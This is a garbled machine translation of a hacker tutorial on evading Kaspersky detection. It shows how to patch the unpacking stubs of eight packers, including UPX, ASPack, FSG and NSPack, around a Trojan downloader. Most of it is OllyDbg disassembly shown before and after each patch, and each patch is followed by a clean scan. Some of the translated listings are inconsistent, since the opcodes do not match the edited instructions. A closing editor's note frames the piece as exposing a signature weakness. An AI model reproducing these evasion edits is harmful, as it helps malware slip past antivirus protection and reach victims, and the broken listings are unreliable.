Simply modify the Trojan shell header to make Kaspersky speechless

Introduction: among the many anti-virus products, Kaspersky has a good reputation among users. Many users say that Kaspersky's Virtual Machine shelling technology is very strong. However, I only made a small adjustment to the general "Shelling" step, but it was amazing that Uncle Kabbah was speechless only by modifying the shell header.

"Look, do you think I don't know you when you wear a vest ?" This line is familiar. Now users use this sentence to describe the anti-virus vendor's shelling technology. The emergence of this technology is closely related to the "shelling" technology used by virus programmers.

As we all know, the so-called "Shelling" is a process of modifying the encoding of executable program files or dynamic link library files through a series of mathematical operations, to reduce the file size or encryption program code. During running, the shell program is first executed, and then the shell program is responsible for extracting the user's original program in the memory, and returning the control to the real program after shelling. All operations are automatically completed, and you do not know how the shell program runs. In general, Shell programs run the same result as those without Shell programs.

In the face of virus writers "Shelling" their viruses, anti-virus vendors naturally adopt the "Shelling" technology. The general process of shelling includes shell check, OEP search (entry point to Prevent Cracking), dump (unload), and repair. Currently, anti-virus software has become an important measure of virus removal capabilities.

A new round of game between virus writers and anti-virus vendors is between the two symbiotic technologies: Shelling and shelling.

Among the many anti-virus products, Kaspersky has a good reputation among users. Many users say that Kaspersky's Virtual Machine shelling technology is very strong. However, I only made a small adjustment to the general "Shelling" step, but it was amazing that Uncle Kabbah was speechless only by modifying the shell header.

I randomly set up a foreign downloader deception4.0 (DT) on the Internet ). Kabbah will kill it, otherwise the test will fail. Although only the 9 value added to DT is modified, Kabbah does not report any virus when it is added to other executable files in this way. The modified program ensures the re-running of the program, otherwise, this modification is meaningless. Start the operation. The following eight most common shells are prepared.

I. First test nspack3.6

Load the DT with the nspack shell with OD, and copy the top 10 lines as follows (the blue bold area is the part to be modified, as shown in the following format)
004cf302 E8 00000000 call duplicate _ (2). 004cf307
004cf307 5d pop EBP
004cf308 83c5 F9 sub EBP, 7
004cf30b 8d85 0 cffffff Lea eax, dword ptr ss: [ebp-F4]
004cf311 8338 01 cmp dword ptr ds: [eax], 1
004cf314 0f84 47020000 je reply _ (2). 004cf561
004cf31a c70001000000 mov dword ptr ds: [eax], 1
004cf320 8bd5 mov edX, EBP
004cf322 2b95 a0feffff sub edX, dword ptr ss: [ebp-160]
004cf328 8995 a0feffff mov dword ptr ss: [ebp-160], EDX
004cf32e 1195 d0feffff add dword ptr ss: [ebp-130], EDX
004cf334 8db5 14 ffffff Lea ESI, dword ptr ss: [EBP-EC]
004cf33a 1116 add dword ptr ds: [esi], EDX

Change to the following (red part)
004cf302 E8 00000000 call duplicate _ (2). 004cf307
004cf307 5d pop EBP
004cf308 83c5 F9 add EBP,-7
004cf30b 8d85 0 cffffff Lea eax, dword ptr ss: [ebp-F4]
004cf311 8338 01 cmp dword ptr ds: [eax], 1
004cf314 0f84 47020000 je reply _ (2). 004cf561
004cf31a c70001000000 mov dword ptr ds: [eax], 1
004cf320 8bd5 mov edX, EBP
004cf322 2b95 a0feffff sub edX, dword ptr ss: [ebp-160]
004cf328 8995 a0feffff mov dword ptr ss: [ebp-160], EDX
004cf32e 1195 d0feffff adc dword ptr ss: [ebp-130], EDX
004cf334 8db5 14 ffffff Lea ESI, dword ptr ss: [EBP-EC]
004cf33a 1116 adc dword ptr ds: [esi], EDX
Save the file and scan it with Kabbah.

Ii. fsg2.0 Testing

The OD load is loaded by the DT with Shell added by fsg2.0.
Copy the top 10 rows, as shown below:
00400154 F> 8725 2c115300 xchg dword ptr ds: [53112c], ESP
0040015a 61 popad
0040015b 94 xchg eax, ESP
0040015c 55 push EBP
0040015d A4 movs byte ptr es: [EDI], byte ptr ds:>
0040015e B6 80 mov DH, 80
00400160 ff13 call dword ptr ds: [EBX]
00400162 ^ 77 F9 JNB short fsg2_0.0040015d
00400164 33c9 XOR ECx, ECx
00400166 ff13 call dword ptr ds: [EBX]
00400168 77 16 JNB short fsg2_0.00400180
0040016a 33c0 XOR eax, eax

After modification
00400154 F> 8725 2c115300 xchg dword ptr ds: [53112c], ESP
0040015a 61 popad
0040015b 94 xchg eax, ESP
0040015c 55 push EBP
0040015d A4 movs byte ptr es: [EDI], byte ptr ds:>
0040015e B6 80 mov DH, 80
00400160 ff13 call dword ptr ds: [EBX]
00400162 ^ 77 F9 ja short fsg2_0.0040015d
00400164 33c9 XOR ECx, ECx
00400166 ff13 call dword ptr ds: [EBX]
00400168 77 16 ja short fsg2_0.00400180
0040016a 33c0 XOR eax, eax
Kabbah scan. No virus is reported.

Iii. Testing winupack

ODPS load the DT with Shell added, as shown below:
00526740 W> 60 pushad
00526741 E8 09000000 call winupack.0052674f
00526746 be 65347e9 mov ESI, e9001265
0052674b 06 push es
0052674c 1200 add Al, byte ptr ds: [eax]
0052674e 1033 add byte ptr ds: [EBX], DH
00526750 C9 leave
00526751 5E pop ESI
00526752 870e xchg dword ptr ds: [esi], ECx
00526754 ^ E3 F4 jecxz short winupack.0052674a
00526756 1bf1 sub ESI, ECx
00526758 8bde mov EBX, ESI
0052675a ad lods dword ptr ds: [esi]
0052675b 1bd8 sub EBX, eax
0052675d ad lods dword ptr ds: [esi]

The modifications are as follows:
00526740 W> 60 pushad
00526741 E8 09000000 call winupack.0052674f
00526746 be 65347e9 mov ESI, e9001265
0052674b 06 push es
0052674c 1200 ADC Al, byte ptr ds: [eax]
0052674e 1033 ADC byte ptr ds: [EBX], DH
00526750 C9 leave
00526751 5E pop ESI
00526752 870e xchg dword ptr ds: [esi], ECx
00526754 ^ E3 F4 jecxz short winupack.0052674a
00526756 1bf1 sbb esi, ECx
00526758 8bde mov EBX, ESI
0052675a ad lods dword ptr ds: [esi]
0052675b 1bd8 sbb ebx, eax
0052675d ad lods dword ptr ds: [esi]
Kabbah scan. No virus is reported.

Iv. ASPack Modification

In the same way, OD loads and copies the first dozen lines of disassembly code. Note that the scroll bar is pulled up one line after loading. Copy the file as follows:
004cc000 90 NOP
004cc001 A> 60 pushad
004cc002 E8 03000000 call asp.004cc00a
004cc007-E9 eb045d45 JMP 45a9c4f7
004cc00c 55 push EBP
004cc00d C3 retn
004cc00e E8 01000000 call asp.004cc014
004cc013 EB 5d JMP short asp.004cc072
004cc015 BB edffffff mov EBX,-13
004cc01a 03dd add EBX, EBP
004cc01c 81eb 00c00c00 sub EBX, 0cc000
004cc022 83bd 22040000 00 cmp dword ptr ss: [EBP + 422], 0

The modification is as follows:
004cc000 60 pushad
004cc001 A> 90 NOP
004cc002 E8 03000000 call asp.004cc00a
004cc007 E8 eb045d45 call 45a9c4f7
004cc00c 55 push EBP
004cc00d C3 retn
004cc00e E8 01000000 call asp.004cc014
004cc013 73 5d JNB short asp.004cc072
004cc015 BB edffffff mov EBX,-13
004cc01a 11eb adc ebx, EBP
004cc01c 81c3 0040f3ff add EBX, fff34000
004cc022 83bd 22040000 00 cmp dword ptr ss: [EBP + 422], 0
Kabbah scan. No virus is reported.

5. Modify jdpack

This is the most complex modification. It's almost totally out of sight. But it can ensure the operation. Before modification
004cc000 complex> 60 pushad
004cc001 E8 00000000 call duplicate _ (8). 004cc006
004cc006 5d pop EBP
004cc007 8bd5 mov edX, EBP
004cc009 81ed c62b4000 sub EBP, duplicate _ (8). 00402bc6
004cc00f 2b95 61344000 sub edX, dword ptr ss: [EBP + 403461]
004cc015 81ea 06000000 sub edX, 6
004cc01b 8995 65344000 mov dword ptr ss: [EBP + 403465], EDX
004cc021 83bd 69344000 00 cmp dword ptr ss: [EBP + 403469], 0

Modified
004cc000 complex> 90 NOP
004cc001 E8 00000000 call duplicate _ (8). 004cc006
004cc006 5d pop EBP
004cc007 8bc5 mov eax, EBP
004cc009 8bd0 mov edX, eax
004cc00b 81ed c62b4000 sub EBP, duplicate _ (8). 00402bc6
004cc011 2b95 61344000 sub edX, dword ptr ss: [EBP + 403461]
004cc017 83c2 fa add edX,-6
004cc01a 8995 65344000 mov dword ptr ss: [EBP + 403465], EDX
004cc020 90 NOP
004cc021 83bd 69344000 00 cmp dword ptr ss: [EBP + 403469], 0
This is really beyond my view, but you can drop all the NOP in front of 004cc021, and then compile it in one line.

Vi. UPX Modification

UPX is the most classic free compression shell. Let's modify it and load the OD. Before modification
004ce240 complex> 60 pushad
004ce241 be 00504700 mov ESI, replica _ (2). 00475000
004ce246 8dbe 00c0f8ff Lea EDI, dword ptr ds: [ESI + fff8c000]
004ce24c c787 0ca70800 A5> mov dword ptr ds: [EDI + 8a70c], 59ad25>
004ce256 57 push EDI
004ce257 83cd FF or EBP, ffffffff
004ce25a EB 0e JMP short duplicate _ (2). 004ce26a
004ce25c 90 NOP
004ce25d 90 NOP
004ce25e 90 NOP
004ce25f 90 NOP
004ce260 8a06 mov Al, byte ptr ds: [esi]

After modification
004ce240 complex> 60 pushad
004ce241 be 00504700 mov ESI, replica _ (2). 00475000
004ce246 8dbe 00c0f8ff Lea EDI, dword ptr ds: [ESI + fff8c000]
004ce24c c787 0ca70800 A5> mov dword ptr ds: [EDI + 8a70c], 59ad25>
004ce256 57 push EDI
004ce257 83cd FF or EBP, ffffffff
004ce25a 77 0e ja short duplicate _ (2). 004ce26a
004ce25c 73 0C JNB short duplicate _ (2). 004ce26a
004ce25e 72 0a JB short duplicate _ (2). 004ce26a
004ce260 8a06 mov Al, byte ptr ds: [esi]
Kabbah scan. No virus is reported.

VII. nspack1.1 Modification

I can see that this is not the same as version 3.6, so this is also changed. This is the simplest command. Kabbah won't make that ugly cry. Od loading:
004cf600 Fu> 9C pushfd
004cf601 60 pushad
004cf602 68 07f64c00 call duplicate _ (4). 004cf607
004cf607 5d pop EBP

Modify as follows:
004cf600 Fu> 9C pushfd
004cf601 60 pushad
004cf602 68 07f64c00 push duplicate _ (4). 004cf607
004cf607 5d pop EBP

8. Modification of Beibei compression (kbys) 0.28

This shell can be comparable to the compression shell of UPX, but it is not as famous as UPX. As long as it is compressed, Uncle Kabbah will kill all the way. After a simple modification, Uncle Kabbah is quiet. Od load, the first four rows are as follows
00401000 complex> E8 f8c10c00 push duplicate _ (5). 004cd1fd
00401005 68 0b104000 call duplicate _ (5). 0040100b; entry address
0040100a \. C3 retn
0040100b $ C3 retn

Modify as follows:
[Color = # ff0000]00401000 complex> E8 f8c10c00 call duplicate _ (5). 004cd1fd
00401005 68 0b104000 push duplicate _ (5). 0040100b; entry address
0040100a \. C3 retn
0040100b $ C3 retn
The above lists the eight shells, all of which are made through simple modifications of the shell header, making Kabbah the world's top anti-virus tool called Virtual Shell removal soft silence, of course, aside from its current active defense against viruses, we did a test on file scanning and removal,

From this, it seems that Kabbah has stored the shell features into the database like a pattern, and is then using the shelling engine to take off the shell for anti-virus. In this case, the features of many shells are placed only on the head of the shell, especially the compressed shell. It is useless to modify the shell header for some encrypted shells. The above is just a speculation.
Editor:By simple modification, the author has escaped Kaspersky's detection and removal of a killed Downloader. In fact, many hackers will modify the Trojan server to prevent antivirus software from being killed. This article uses Kaspersky as an example. I believe that most well-known anti-virus software will encounter such problems. The editor believes that anti-virus software should not simply recognize the header of a shell and take a composite shell pattern, which will increase the scanning and removal strength. In addition, we can see a defect from the kbys compressed shell. kaback killed the executable file that added the shell, but it does not seem to have been killed after shelling, so as long as the shell is free of kill, the files with the shell will be free of kill, and the kill is not thorough. In addition, during the modification process, it was found that some encrypted shells were found to be more powerful for Kaba detection. This seems to have different attitudes towards different types of shells and Kaba, but as anti-virus software, it should be a one-time full signature.